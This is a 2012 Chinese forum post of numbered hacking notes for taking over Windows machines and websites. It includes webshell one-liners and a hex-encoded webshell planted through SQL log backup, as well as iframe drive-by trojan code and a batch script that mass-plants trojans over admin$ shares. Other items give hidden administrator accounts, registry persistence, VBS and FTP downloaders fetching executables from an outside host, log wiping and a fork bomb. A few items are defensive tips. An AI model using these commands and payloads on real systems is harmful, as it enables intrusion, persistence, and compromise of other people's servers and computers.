找回密码
 立即注册
查看: 2844|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
  h) \' G& c. @7 t' W2 a! Dcacls C:\windows\system32 /G hqw20:R
. q8 m9 F9 w, F6 j思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- N+ d4 y1 g) W
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ L! ]. |% i) I! }$ T4 @# i# |
/ L8 G/ B* b5 Q$ P8 A
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。: ^% H8 I: f1 b7 _) b+ K5 J
2 _  E0 C+ A- Z/ [& L8 P( ]
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。- e+ r9 S1 u* b/ p/ ?
  b1 T; h6 B" |
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号: Z% H6 y' I0 e6 Z; x3 v
! r8 v0 T8 V  e" c! }6 d' e+ C
5、利用INF文件来修改注册表, J- \3 P5 h- w
[Version]- ?$ B& X% k; k# r; L0 t2 T3 v3 C
Signature="$CHICAGO$"
4 B8 I9 |, r! {# K2 f" C[Defaultinstall]
% j- X% ^( i( T3 h! HaddREG=Ating
1 c# h& I0 ?6 a2 g[Ating]
4 b0 @7 w' Z+ mHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. G! x7 i8 K, I' S1 F以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
, Y' m' z. g+ [8 Yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 N! Q7 d* F- a; J0 O$ N其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU2 ~7 p6 Q" D6 l) ?9 Y# a* R8 i
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! p$ ~  z5 V, w$ l. R
HKEY_CURRENT_CONFIG 简写为 HKCC3 L1 C' o5 n& H. a5 X3 \
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
( ]9 u9 v+ h& t3 x  {* X' q/ R"1"这里代表是写入或删除注册表键值中的具体数据0 r2 v0 @6 u/ j- ^, _2 z
7 x2 f; ?$ l/ I8 c& Q. @
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,  {/ V) R% d6 Q+ p3 g4 Z5 W3 w) N0 s2 X
多了一步就是在防火墙里添加个端口,然后导出其键值8 n  `9 X) z# K/ X
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
& G) a. e/ N3 h, d3 r
: {- F' Y, l( y7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
  x7 _2 I0 |7 H- W8 @在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
4 P/ ^1 F3 |" O, [
/ X" I* U5 J* u  q8 p( {$ E  v8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 ^' j* C* P7 T6 B' n; g
; ]8 h9 p7 O$ B9 y! \# {3 Z
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# j5 h& R( A* K  |
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
5 F+ e  B1 o! r/ \% e6 V
0 W7 \, F' s" X. G10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
3 |! u! G% B$ M; _8 o2 G
9 V1 `* ^* J; {3 @( G( k( V11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
/ m) u* R* T8 H用法:xsniff –pass –hide –log pass.txt
+ z2 b/ v/ ]0 F" F. o% x1 t9 v' F3 q5 `0 ]
12、google搜索的艺术9 c7 t. B) n4 \9 M' f4 u
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”+ J! w3 }$ I8 J3 S) w6 j
或“字符串的语法错误”可以找到很多sql注入漏洞。
9 H4 F8 ]9 m' \
# Z4 w; t& Y6 f5 K, X13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 G4 i2 i% ^9 t" U6 j
: r, w+ o7 [! C8 Y3 r$ `14、cmd中输入 nc –vv –l –p 1987* f/ G3 h! T* c' d& ]7 |
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 w* |- i' y* T% U8 o

& o$ `9 ?6 ~) n$ V8 |15、制作T++木马,先写个ating.hta文件,内容为0 s! f9 G: Q- L
<script language="VBScript">
% `, p2 w8 r. d% dset wshshell=createobject ("wscript.shell" )
; l+ }+ I. W2 C; V* K0 va=wshshell.run("你马的名称",1)
1 a9 P$ |8 ]6 ^  b- S% @5 I7 {window.close
& I4 B1 R4 I5 z</script>
( A; ~& F+ b4 p再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。/ K- |6 d! i; o5 _& a. v

% R# e/ T+ A4 O( G6 H4 e; F16、搜索栏里输入
! p' F' N7 Y( q" |9 l关键字%'and 1=1 and '%'='+ |8 u! t- Q' y5 ]$ Y* c
关键字%'and 1=2 and '%'='! z6 B0 e% T5 y4 c
比较不同处 可以作为注入的特征字符
4 ~, Z, s3 {& j4 q5 ^" i1 i; R2 R. ^. Z# e0 Z
17、挂马代码<html>
( C2 e) X7 X# @2 E0 n4 B3 s3 ~<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
' L  T! ]( v7 i" \</html>
7 R. j! r$ h0 Q8 m4 C' w& F2 a6 z: n$ \( T7 d( z
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! C6 ^2 Q% o, c1 \6 C0 Y4 E& [
net localgroup administrators还是可以看出Guest是管理员来。  w% W) v/ E! C0 A# {' B8 k+ r

) {# ^" u; ^% s" E& `" w. ?19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 j- v( o: l+ _
用法: 安装: instsrv.exe 服务名称 路径- J" T3 G& M+ @: q2 P) _
卸载: instsrv.exe 服务名称 REMOVE7 u: F' |7 J  K

/ x9 `8 [0 d" ?( i: a5 E+ n9 {) n
# {$ L  c* C& v( x) W$ y8 K21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
+ K2 j2 i  H. F% \+ B+ H& J9 H不能注入时要第一时间想到%5c暴库。1 t8 I6 ~+ u  M, {- c
) G  E" v  J7 a! s( y
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~% V* ]" v& B5 s. n% I$ p( U

4 V7 G( F; u! W23、缺少xp_cmdshell时% D8 u& l# o8 x, c' ]8 z  o4 s3 v4 ^
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'9 [5 m: |' ^0 H4 ~# ]
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, s" w2 ^- d! [# E% Xdeclare @o int. Q- Y* S- U2 a2 W  [! n
exec sp_oacreate 'wscript.shell',@o out
0 r( a: {5 ?, N8 g/ n/ ~1 Cexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员& x: e( b0 A+ }2 q1 S$ H8 |
0 v  w. n$ Q! g2 d
24.批量种植木马.bat
% G. z5 q( y  J, P& q5 X# R# ]- Ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ E3 x# J) N( c  \# t
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
* K+ K- v( C  ~扫描地址.txt里每个主机名一行 用\\开头( B+ B; {, c8 I; W4 T

( s2 v( {( t! K! c* I25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 }9 Y- L' f9 L* w6 }- p6 ?$ J& @0 i6 }) ^) S+ X
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.6 x$ J% ^) h, E- ]! d
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
3 O/ i" r" e% Z8 T! J.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
, E3 _# Y( P' A2 ^  ?. p4 K
" S5 t- l" x: ~0 B! S- w" ]2 t+ O  }, _27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% z( N7 J$ ^$ R# l, D然后用#clear logg和#clear line vty *删除日志
  O6 t( D' A# P, p' m; i  y1 F; Z3 b5 i0 L& o7 U- r
28、电脑坏了省去重新安装系统的方法1 m6 y7 E% c* K/ }3 d/ p2 u+ M
纯dos下执行,& f! h, U% M# V$ o7 p: c! ?
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
0 {  ^0 }* L4 V) a2 @2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
$ h2 x) W+ `% {2 Q1 ?9 W/ ?# H+ L$ D3 l9 n5 d: `* _3 u
29、解决TCP/IP筛选 在注册表里有三处,分别是:. t* W; S, r" k
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 E3 I) r( M9 X# w6 H5 s: t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) J3 T: X% g" a( o
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 L8 Y% k: L. X$ ?分别用
7 F& n6 u# Z0 S& Iregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 H9 r7 Y, |, p9 f' L, C
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- Q9 ?2 b6 g! [& k& O3 _# u6 sregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
) c8 w; q" ]/ }5 I命令来导出注册表项8 z) e9 \6 t7 M; ~# T7 K) t
然后把三个文件里的EnableSecurityFilters"=dword:00000001,- a3 ~( {' P1 w. ~( p
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用! r. L8 q, o/ S1 R
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
% v3 j% V4 i2 l: g3 y
% F* x7 K. W, g' k1 |* H, E2 g30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U0 d" x/ F6 B$ j7 I( ~7 z9 [$ N& G
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. t1 i" K9 t6 R- C* o# C. R  b

9 _. ]' }1 J, h6 T4 e& L) Q31、全手工打造开3389工具+ k2 s/ e( U: c. a5 E- b9 B
打开记事本,编辑内容如下:
' [. f% q* v/ [; j- }4 n! pecho [Components] > c:\sql" l( N# A9 }& u& g- o  A) A: E
echo TSEnable = on >> c:\sql
1 Y4 j) r4 [+ B; hsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 m0 ]/ W+ J; [+ O3 W编辑好后存为BAT文件,上传至肉鸡,执行( U, Y' K# V. _) _! z# A
- i, x4 H, _  a& |2 {
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马, x" j- E- B0 t' m6 Q
5 {& d0 R3 h+ ~) W# Q
33、让服务器重启/ Z6 D5 O# ^' g* H0 j
写个bat死循环:
& S7 w$ r+ x: h@echo off  x/ ?% R; Q/ W7 @# f0 J4 d
:loop17 N, J$ P" ?, q0 l5 ]2 k9 D
cls/ J( @6 b7 ~- T5 x2 _0 n% p$ E
start cmd.exe
2 D9 ?4 g5 {, ?& x& a/ igoto loop1. x8 I, Q0 i/ U; ~; P/ C
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
- a2 d2 ?. `8 u: d6 C0 U! C& B' M% G% m0 H0 W, A3 n4 V
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,7 G7 m+ d2 U; E$ N+ a
@echo off2 Z( R% b) Q) W* v* a! B
date /t >c:/3389.txt
; @& O/ x) r. n$ r( n% ?time /t >>c:/3389.txt( \- ?* C( m. C
attrib +s +h c:/3389.bat/ }2 m3 l& ], p- {2 l7 Q
attrib +s +h c:/3389.txt+ K3 m# U* E$ j
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt& L; `- j3 g6 u7 k. @: X- G7 s0 t' R
并保存为3389.bat! e4 H% X! @! w( K( }
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- X) u* z/ g; Y9 x# f  N! B" {- G" c2 E2 ~# C7 E
35、有时候提不了权限的话,试试这个命令,在命令行里输入:, u- m# x  l- ^3 U& K. B4 H- S+ e
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)+ X. O8 |6 Q6 n, _4 f7 G
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
5 |9 }, ~  u$ {4 A# }
4 k+ C9 Y! S7 Q& F( \  I36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件3 c( _! s8 p6 V: Z' i3 O7 Q; e4 Y
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 N0 u) M7 P: D, E- Y1 n
echo 你的FTP账号 >>c:\1.bat //输入账号
. @" X3 [# {, M9 D/ C  W" {7 S2 Eecho 你的FTP密码 >>c:\1.bat //输入密码
9 |1 t/ ]! E+ N. B3 yecho bin >>c:\1.bat //登入$ `& k& x; S/ x) i' ~, g4 ]
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ e! E( V  Z$ `6 \( V6 O5 T
echo bye >>c:\1.bat //退出3 g% ]- s) D; f- V7 D. @
然后执行ftp -s:c:\1.bat即可
+ z8 Y0 l7 q* T( t  N2 z+ M. q9 L- l7 o+ _. Q5 ^$ T/ a
37、修改注册表开3389两法
7 [/ T( Y/ w. c- T' r(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ {; w! a' I+ R( u9 T/ uecho Windows Registry Editor Version 5.00 >>3389.reg
) w! z# P' J0 Z6 X/ F% k( I2 Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg. I0 M) ]" _1 h5 @% }  x: ~
echo "Enabled"="0" >>3389.reg  A6 L, ]$ A0 S0 ~1 g* U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ |+ }! t7 M0 [" H' }3 f( b. |( eNT\CurrentVersion\Winlogon] >>3389.reg
, r! Z9 c! r: L( s" Y8 aecho "ShutdownWithoutLogon"="0" >>3389.reg
, i  o3 x* h6 ~- L) }. W5 eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
8 E# ^' }0 I6 z  j1 J>>3389.reg
: x% a7 S) ]; d3 ]" P- b  [( A' Y; t4 ~echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg) f+ i( F4 `9 ^4 Z7 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]% l! D* g9 b# e  @% y: ^
>>3389.reg
& N% h/ J- H2 h! H/ |' J& secho "TSEnabled"=dword:00000001 >>3389.reg# D$ x! u% e/ y, T' j  U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- U6 F' Z4 o6 m5 i. {
echo "Start"=dword:00000002 >>3389.reg4 `* j: ~( U; P! D1 i9 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]6 f7 _" g0 p; f/ b1 F
>>3389.reg
5 @' y2 }6 C9 N$ hecho "Start"=dword:00000002 >>3389.reg
" z( }( w3 C2 aecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ W. l3 x% c  \echo "Hotkey"="1" >>3389.reg6 X; w6 n' E: B8 \0 i1 e- f: P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- B4 E' K+ \; z1 l" I9 {Server\Wds\rdpwd\Tds\tcp] >>3389.reg
4 X! I$ t9 f  ]3 G" W& S; Kecho "PortNumber"=dword:00000D3D >>3389.reg
  u4 m+ K9 E# \+ T5 N1 D5 S) Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 ^$ I  K  z& f/ T% [( Y. C: pServer\WinStations\RDP-Tcp] >>3389.reg9 @, S* ?8 U+ ?; s. B
echo "PortNumber"=dword:00000D3D >>3389.reg
1 y- r& R+ ]- N8 b5 ?把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。4 @+ P" x' m: G7 Z* H! b% q1 Z( J( }
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
7 e8 P$ n( W' L- D- ^. e2 [因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效* k4 z# {6 L9 L$ G# M" M/ V
(2)winxp和win2003终端开启
! X  f! n% H5 ?6 v用以下ECHO代码写一个REG文件:
6 v* |6 R9 I- C* }, V3 T: yecho Windows Registry Editor Version 5.00>>3389.reg
  d3 t0 N7 {; o* }  wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! X$ V$ r' f. P6 aServer]>>3389.reg: m- C, W' r) M2 {
echo "fDenyTSConnections"=dword:00000000>>3389.reg
& G* U) E4 f7 l. i4 g0 A6 Q) \& B1 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, [+ F1 h8 W) \! ?Server\Wds\rdpwd\Tds\tcp]>>3389.reg# ]9 d( p' d+ W
echo "PortNumber"=dword:00000d3d>>3389.reg/ B! M6 {2 u! o/ S0 A7 H: y, G. X2 D$ E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' \( F6 T* q, R6 Y: e) ^7 `+ UServer\WinStations\RDP-Tcp]>>3389.reg
: B* q# H4 A3 Y( p, V, {echo "PortNumber"=dword:00000d3d>>3389.reg& X& b0 x! R" b" b' [- W
然后regedit /s 3389.reg del 3389.reg
& J! D) \% H0 v+ r: d: ]XP下不论开终端还是改终端端口都不需重启5 p8 \' Y1 l+ o  ~
; k, s, d+ `7 ]5 c$ }) g
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 ^. |4 f; h: N  `7 U/ o+ X! |) |
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'6 G% ?6 |- H' ~# P' B
, c( `: W( e! j  M$ ?
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!) \5 z; D; P% Q
(1)数据库文件名应复杂并要有特殊字符
( j: }  [$ S) ~- P% f" C. s0 q(2)不要把数据库名称写在conn.asp里,要用ODBC数据源( V, r4 m9 f3 P
将conn.asp文档中的3 f, W8 L, G, o
DBPath = Server.MapPath("数据库.mdb")1 z) W0 H$ a9 f) P
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath* V8 E8 I, u# x" m! ?( P" ^

% }5 d2 g% \8 z/ w7 c* b( @* m修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置  F1 p% @( k7 ^; r3 h$ y3 h  C# L
(3)不放在WEB目录里+ C- `6 m7 L/ \

- X# B% Q" ?/ e, ]. y% A40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉1 k5 N9 q5 j5 f" l
可以写两个bat文件
8 J7 ]( b6 z4 ]+ a6 d2 a+ a@echo off9 y; J4 r" k. ?8 K
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 p8 C; R: o, N+ o- B! T@del c:\winnt\system32\query.exe
# a4 `) i' C. J, o4 i- f@del %SYSTEMROOT%\system32\dllcache\query.exe
6 a" g" E. n4 }- {* s, H2 n! i. ]@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
  `5 A/ c/ b# l. L
+ l4 e" w$ G5 m9 V7 B# |2 m# `  }@echo off, W7 U2 u7 e( C
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
8 p. i0 J! d9 R9 {* O, u$ ^1 w@del c:\winnt\system32\tsadmin.exe+ M/ i) J( u3 ~8 L# b1 e% r6 F7 d
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex+ A" P' r" D7 Q6 c  ]

* I8 d7 b& O, @6 G3 G41、映射对方盘符* ?: X2 p# T- f3 A$ O8 h' ^' @; N5 e
telnet到他的机器上,+ Q. S2 n; u4 f! I! a
net share 查看有没有默认共享 如果没有,那么就接着运行. X, N  |* {* o
net share c$=c:) W  a. j. L$ V) P7 ]. O% P! H
net share现在有c$
0 H1 f2 {* v0 [5 G( C在自己的机器上运行9 p/ `1 n+ z& _1 X7 \1 }
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K: s6 ?% N4 p2 Q% ?  d! H5 J9 d

3 n' ?/ R8 T' O/ s2 |, S: v. T42、一些很有用的老知识7 B' W7 B  D) ^: b0 I
type c:\boot.ini ( 查看系统版本 )5 k4 ^* Y. s* k% J7 g4 f8 W
net start (查看已经启动的服务)6 l, |5 i7 Z7 i# k$ d
query user ( 查看当前终端连接 )- b( Z: ^0 e$ J  ^) s
net user ( 查看当前用户 )7 q' O" k# q% J1 g$ @
net user 用户 密码/add ( 建立账号 )
1 i* |) o  ]0 Rnet localgroup administrators 用户 /add (提升某用户为管理员)+ G6 Z1 v3 N8 w; s* T% z; W/ J
ipconfig -all ( 查看IP什么的 )# s5 R1 c$ Y" O0 V& y
netstat -an ( 查看当前网络状态 )
: p0 m: Z8 M( j$ sfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
4 p* H0 P5 Y+ {( V% T+ P克隆时Administrator对应1F4
+ V1 M% f/ Z3 X; V, i7 ?6 \guest对应1F5. X9 x. p2 \, _! u$ F
tsinternetuser对应3E8
- x! ^% P8 J- M8 C, \, U& O$ O1 H; E2 I( k/ Z8 M
43、如果对方没开3389,但是装了Remote Administrator Service
( K( q) D1 g. C0 s1 @用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
% ~$ A# R, P# E; [  ]0 {解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 l& Q& O  N; j, _+ c2 S6 }先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* ~# V) U, W  ~7 K+ r# J
0 D, |& r* j- g
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)$ T& R/ j3 I3 ]! e4 u2 M8 {
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)+ D1 ]: S! v. a

: w# A4 C2 b# w6 b% V0 t45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)7 o* D% B/ c8 ~' B
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open) ?! W- V% f% a3 f* \! P; I
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 b! e! U+ O7 ?0 J, d1 s
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
( a1 J, f) T( D- C+ U7 p0 n1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. Z. V9 L8 Z9 {1 Z& ?, ?7 Y(这是完整的一句话,其中没有换行符)& x# }$ _+ E5 o7 I) U
然后下载:& a! E9 t9 e2 q4 f' x) L) o6 d
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 I6 o6 J" B  J% e5 U% W; T
- g  f1 a' z( w. V9 n, s9 P46、一句话木马成功依赖于两个条件:
" C- s. H: l, L- {8 Z6 U$ Q1、服务端没有禁止adodb.Stream或FSO组件
! J+ b& R, C6 n  n  ?2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。& D+ x  E" W+ {

( i2 ^7 s5 j1 J! t9 J4 o47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. P' D5 A9 ?' l6 S% R$ m% X7 z0 ^;alter database utsz set RECOVERY FULL--6 R: ?' j8 w) ]7 h% Z3 I
;create table cmd (a image)--. m2 y5 ^, n6 k9 c
;backup log utsz to disk = 'D:\cmd' with init--
# B7 d* [6 Y3 a% Y; _! o;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--4 o. e# L0 ~3 z, Z0 Y7 g
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--1 f; |; C4 U8 V  ~3 q/ n7 H
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。& j6 G* s/ Y' k& B0 s

4 i, P" i* h2 Z48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" k' Z' x: N7 f; w+ z- B6 x1 ^3 a  R. \* w0 x
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
1 B! z9 d1 o( h0 V所有会话用 'all'。
$ g/ I0 @+ j! [0 q  b9 {4 ]2 y7 T-s sessionid 列出会话的信息。4 Q( t' f$ d$ _+ }
-k sessionid 终止会话。. E3 c: l5 y, c3 ]8 w7 b* S- }
-m sessionid 发送消息到会话。
/ r) B% \: m1 p% T
, I1 B9 {8 @; h: c0 ~config 配置 telnet 服务器参数。
5 j- R* R; K  I" K( g5 r- ~, P1 q. Y2 P. o( F1 G
common_options 为:0 i8 _7 z/ U: ?- I, w) \
-u user 指定要使用其凭据的用户
$ q4 v0 ?  }6 S$ i: Q-p password 用户密码
, U( J+ H4 j: U' _2 T# j$ o/ N8 J' S9 a
config_options 为:0 ^" s! R( |+ s. O) D2 }: c
dom = domain 设定用户的默认域( i# r- D3 U  s( W
ctrlakeymap = yes|no 设定 ALT 键的映射
* X; w  y0 @# u8 f, C& q, Ltimeout = hh:mm:ss 设定空闲会话超时值# ]0 C$ ^; E$ x4 c  F- E( d$ G7 M7 D
timeoutactive = yes|no 启用空闲会话。
9 r/ B6 m% D5 M+ `* D3 rmaxfail = attempts 设定断开前失败的登录企图数。* Z9 [5 R% L$ {5 ~
maxconn = connections 设定最大连接数。& @* p: Y6 ^; O
port = number 设定 telnet 端口。
8 o2 w: T& K2 M: J* s' e# u' m; gsec = [+/-]NTLM [+/-]passwd* e6 w! u( `/ v' T) S
设定身份验证机构
5 h. R5 c5 N* h* r7 n+ q/ k" gfname = file 指定审计文件名。
, {8 z/ I1 c* {fsize = size 指定审计文件的最大尺寸(MB)。
+ _0 ?" ^$ j9 m2 Q% Lmode = console|stream 指定操作模式。
0 C1 p% }7 R$ y, h( u. T$ ?, u0 zauditlocation = eventlog|file|both5 }  c4 q2 U  G) L$ v: h3 D* \- }
指定记录地点" I3 F  n0 R- }9 y! \
audit = [+/-]user [+/-]fail [+/-]admin+ Y2 l9 {* }; p" K/ A; f5 h& J

; Y0 a' ~- g4 l( \! W7 p5 t6 R9 F49、例如:在IE上访问:
# O" }9 S0 r8 z5 r9 H! J0 o  ^www.hack520.org/hack.txt就会跳转到http://www.hack520.org/, j9 d. Q/ j- n! H. W$ \
hack.txt里面的代码是:& c8 X7 M+ e& z0 K) o: r' U9 m
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">7 |) q1 Z1 J* f2 V! P
把这个hack.txt发到你空间就可以了!- {2 |$ c+ }, h& ]* |
这个可以利用来做网马哦!" L7 b/ W8 z2 z8 K8 g% x
2 y3 k) `( i) p" h
50、autorun的病毒可以通过手动限制!6 D# r1 O6 X! F" [4 \
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!/ n: m: q/ s! H$ e3 S& i9 \. w
2,打开盘符用右键打开!切忌双击盘符~
; k' B# _9 ?: l/ Q3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!4 a# Y, x& f3 b9 K
3 \5 ?7 M3 h* F9 @# q# P
51、log备份时的一句话木马:
8 p5 ?0 F; _5 g3 Q8 {+ q& Za).<%%25Execute(request("go"))%%25>* _" S& v3 ^& c3 L: ~
b).<%Execute(request("go"))%>
